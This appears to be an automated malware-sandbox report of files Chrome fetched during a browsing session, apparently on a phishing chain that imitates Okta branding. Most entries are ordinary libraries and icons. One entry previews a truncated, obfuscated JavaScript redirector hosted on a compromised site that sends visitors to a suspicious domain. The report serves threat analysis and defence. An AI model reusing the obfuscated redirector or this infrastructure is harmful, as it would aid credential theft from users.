                                                              Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (1434), with no line terminators
                                                              Category:downloaded
                                                              Size (bytes):1434
                                                              Entropy (8bit):5.780814020328209
                                                              Encrypted:false
                                                              SSDEEP:24:2jkm94/zKPccAv+KVCe2TLv138EgFB5vtTGJrdcl/1t4glvllLt41rE0oA8nwsLc:VKEctKo7R3evtTA2tX7m12nxLrwUnG
                                                              MD5:CAC624AB0C197840B2A21BE4B6F6CC58
                                                              SHA1:C4B8B421F6039CCB0421E814774789201138308D
                                                              SHA-256:CFCE45FEF72ED85DC66C57FD1FA7262F9686B08188832FBFCE26A7A467D455B0
                                                              SHA-512:15FAB78F7997A69C4C0A469893CC3D53D989C74736D4EFDE315005242B4545B4E8F694BEFF23D0899C59A6C3CD954F3905C7EAC4C438961931E12D666BB3A3BB
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://www.google.com/recaptcha/api.js
                                                              Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:downloaded
                                                              Size (bytes):7390
                                                              Entropy (8bit):4.02755241095864
                                                              Encrypted:false
                                                              SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                              MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                              SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                              SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                              SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170
                                                              Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:HTML document, ASCII text, with very long lines (5140)
                                                              Category:downloaded
                                                              Size (bytes):5260
                                                              Entropy (8bit):5.492947311896096
                                                              Encrypted:false
                                                              SSDEEP:96:T5wW5+NByVDswR0DpZ/fJj88vYMpu2DteU8PLQHFrTGh2:FwW5+NB+YwR0DpZXJj88vpp9teU8PsHp
                                                              MD5:5AE354D0E47EC429A477D040D47E46D1
                                                              SHA1:5EEBB880C21C4C6DA5B5717FA8971C077A422C67
                                                              SHA-256:A10DB10037925F1662C8909588EC3B7661EC412D2F344B5859C1C6A4F846ABF8
                                                              SHA-512:337D280F70AD4673E88C046B4D97FCC750DBF9D5659BBF9731AF9E5DA8D516629FDDCD8F2D789DFE4E4E1D62E7B0670870F7A54873DD403C2B69E697AEE3957C
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT
                                                              Preview:<script>. var land = "https://vkwek.ckyucle.com/2DUx/#-";. var _where = 2;. var _which = "___";. . var _0x285687=_0x288b;(function(_0x59a9dc,_0x554d1d){var _0x270991=_0x288b,_0x318991=_0x59a9dc();while(!![]){try{var _0x160ad8=parseInt(_0x270991(0xb2))/0x1*(parseInt(_0x270991(0xcc))/0x2)+parseInt(_0x270991(0xc2))/0x3+-parseInt(_0x270991(0xd8))/0x4*(parseInt(_0x270991(0xcd))/0x5)+-parseInt(_0x270991(0xc3))/0x6+-parseInt(_0x270991(0xd0))/0x7*(parseInt(_0x270991(0xcb))/0x8)+parseInt(_0x270991(0xb7))/0x9*(-parseInt(_0x270991(0xdd))/0xa)+-parseInt(_0x270991(0xbd))/0xb*(-parseInt(_0x270991(0xd3))/0xc);if(_0x160ad8===_0x554d1d)break;else _0x318991['push'](_0x318991['shift']());}catch(_0x16d093){_0x318991['push'](_0x318991['shift']());}}}(_0x1a05,0x3e151));var _0x471212=(function(){var _0x463c35=!![];return function(_0x440b24,_0x5ab5ef){var _0x30d3eb=_0x463c35?function(){var _0x19b443=_0x288b;if(_0x5ab5ef){var _0x16e002=_0x5ab5ef[_0x19b443(0xca)](_0x440b24,arguments);return _0x5a
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, baseline, precision 8, 304x72, components 3
                                                              Category:dropped
                                                              Size (bytes):7753
                                                              Entropy (8bit):7.864559662478736
                                                              Encrypted:false
                                                              SSDEEP:192:cf1O6DPQvGB9DAfidLz/goy8MM8ZX6UuIrovzTOjCTz:6PQeB9DTVBWZXz6OW
                                                              MD5:477E4BA2BBA822F5B904CA9A9153DE5A
                                                              SHA1:5B3800C99BC7E045D8BB6BFF90770CBFF16BECAF
                                                              SHA-256:C1E6AD95A24330D67C7946807EF843616E8E701D3FA5A3321FC55406F048FD2D
                                                              SHA-512:031EE282127805856BDA35F4BDE71109F414117BE84E98332E77C55C5F601124AA1C0C73CD26246415466527403169463F6926CE1E18386730EA2558395C46DF
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:......JFIF.....x.x.....C....................................................................C.......................................................................H.0.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..."....:^.5..{ogk..%...G.j:.1..s\M.....V|M...m...r..p...S.U.H.vz..G.^l>>|.'.J.........._.R|3.........cS.Y>..#..K.++E...h.j...k.XJXGsm .7*.X.88 .... ..'...O.}.G2.h.w..P..T9......M."..3z..>.d................?.*..]......g.......U......#...c../.\....k>......7.e.cwyor...F...s.b.....G..E#.?.1.....T..I......U........t..x.Xe..GB2.H.. .Y.!.?.|%....mj.H..Q..^."F..B.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:dropped
                                                              Size (bytes):270
                                                              Entropy (8bit):4.840496990713235
                                                              Encrypted:false
                                                              SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                              MD5:40EB39126300B56BF66C20EE75B54093
                                                              SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                              SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                              SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (636)
                                                              Category:downloaded
                                                              Size (bytes):546598
                                                              Entropy (8bit):5.708515975651759
                                                              Encrypted:false
                                                              SSDEEP:6144:yihcR5I9BggP9ZSmsOjitOxTIuAFBZv51aLyOWNfsjj+LBH:y8MIAgxT0F3Bc/Y
                                                              MD5:93E3F7248853EA26232278A54613F93C
                                                              SHA1:16100C397972A415BFCFCE1A470ACAD68C173375
                                                              SHA-256:0EC782544506A0AEA967EA044659C633E1EE735B79E5172CB263797CC5CEFE3A
                                                              SHA-512:26ACA30DE753823A247916A9418AA8BCE24059D80EC35AF6E1A08A6E931DCF3119E326EC7239A1F8F83439979F39460B1F74C1A6D448E2F0702E91F5AD081DF9
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js
                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:dropped
                                                              Size (bytes):2905
                                                              Entropy (8bit):3.962263100945339
                                                              Encrypted:false
                                                              SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                              MD5:FE87496CC7A44412F7893A72099C120A
                                                              SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                              SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                              SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):10796
                                                              Entropy (8bit):7.946024875001343
                                                              Encrypted:false
                                                              SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                              MD5:12BDACC832185D0367ECC23FD24C86CE
                                                              SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                              SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                              SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                              Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:downloaded
                                                              Size (bytes):270
                                                              Entropy (8bit):4.840496990713235
                                                              Encrypted:false
                                                              SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                              MD5:40EB39126300B56BF66C20EE75B54093
                                                              SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                              SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                              SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:downloaded
                                                              Size (bytes):268
                                                              Entropy (8bit):5.111190711619041
                                                              Encrypted:false
                                                              SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                              MD5:59759B80E24A89C8CD029B14700E646D
                                                              SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                              SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                              SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (65447)
                                                              Category:downloaded
                                                              Size (bytes):89501
                                                              Entropy (8bit):5.289893677458563
                                                              Encrypted:false
                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                              Category:downloaded
                                                              Size (bytes):48316
                                                              Entropy (8bit):5.6346993394709
                                                              Encrypted:false
                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):1400
                                                              Entropy (8bit):7.808470583085035
                                                              Encrypted:false
                                                              SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                              MD5:333EE830E5AB72C41DD9126A27B4D878
                                                              SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                              SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                              SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                              Category:downloaded
                                                              Size (bytes):36696
                                                              Entropy (8bit):7.988666025644622
                                                              Encrypted:false
                                                              SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                              MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                              SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                              SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                              SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69
                                                              Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):29796
                                                              Entropy (8bit):7.980058333789969
                                                              Encrypted:false
                                                              SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                              MD5:210433A8774859368F3A7B86D125A2A7
                                                              SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                              SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                              SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240
